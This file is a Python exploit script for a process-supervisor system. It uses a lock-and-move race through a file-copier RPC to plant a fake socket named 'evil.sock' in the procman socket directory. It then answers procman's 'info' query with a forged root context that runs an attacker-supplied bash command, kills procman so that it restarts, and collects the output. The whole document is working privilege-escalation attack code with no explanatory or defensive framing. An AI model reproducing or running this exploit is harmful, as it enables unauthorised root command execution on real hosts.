#!/Berkanavt/supervisor/base/active/python/bin/python

import socket
import sys
import os
import msgpack
import time
import threading
import uuid
from functools import partial


from api import procman
from api.skycore.utils import rpc_client
from api.copier import Copier


def tmp_name():
    if 'name' not in tmp_name.__dict__:
        tmp_name.name = str(uuid.uuid4())
    return tmp_name.name


def listen_linear(socket_path, target_command):
    try:
        os.unlink(socket_path)
    except OSError:
        if os.path.exists(socket_path):
            raise

    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(socket_path)

    print('Listen on {}'.format(socket_path))

    sock.listen(1)

    try:
        while True:
            conn, addr = sock.accept()
            while True:
                data = conn.recv(4096)
                if not data:
                    break

                command = msgpack.loads(data)
                if command == 'terminatepg':
                    print('terminate request received')
                    raise Exception('stop')
                elif command == 'info':
                    conn.sendall(msgpack.dumps({
                        'version': 1,
                        'pid': None,
                        'pgid': None,
                        'context': msgpack.dumps({
                            'peer_pid': 0,
                            'peer_uid': 0,
                            'keeprunning': False,
                            'cgroup_inherited': {},
                            'user': 0,
                            'args': ['/bin/bash', '-c', target_command]
                        })
                    }))

                    raise Exception('stop')
    except:
        pass
    finally:
        conn.close()


def share_path(path):
    copier = Copier()
    handle = copier.create([path])
    return handle.resid()


def main():
    work_dir = sys.argv[1]
    result_path = '%s/result.txt' % work_dir
    command = 'bash -c "%s" > %s' % (sys.argv[2], result_path)

    sock_name = 'evil.sock'
    src_path = os.path.join(work_dir, sock_name)
    dst_path = '/Berkanavt/supervisor/var/procman/%s-evil.sock' % tmp_name()
    try:
        os.makedirs(os.path.dirname(src_path))
    except:
        pass
    os.chmod(os.path.dirname(src_path), 0o777)

    rpc = type(rpc_client(True))('/Berkanavt/supervisor/var/copier/rbtorrent/rpc.sock', None)

    # first of all - share & lock socket path
    with open(src_path, 'w') as f:
        f.write('fake')
    print('share fake src %s: %s' % (src_path, share_path(src_path)))

    print('call lock_files %s' % src_path)
    file_lock = rpc.call('lock_files', [src_path])

    # now start file moving
    print('call file_move %s -> %s' % (src_path, dst_path))
    file_move = rpc.call('file_move', [(src_path, dst_path)])

    # OK! now remove our fake file & start linear
    time.sleep(1)
    listen_thread = threading.Thread(target=partial(listen_linear, src_path, command))
    listen_thread.start()

    # release lock
    time.sleep(1)
    file_lock.send('done')
    print('file move: %s' % file_move.wait())

    # Stops procman and hopes to auto-restart
    print('kill procman: %s' % procman.ProcMan().stop())

    # wait procman
    listen_thread.join()
    print('hmmm, check result: %s' % result_path)


if __name__ == '__main__':
    main()
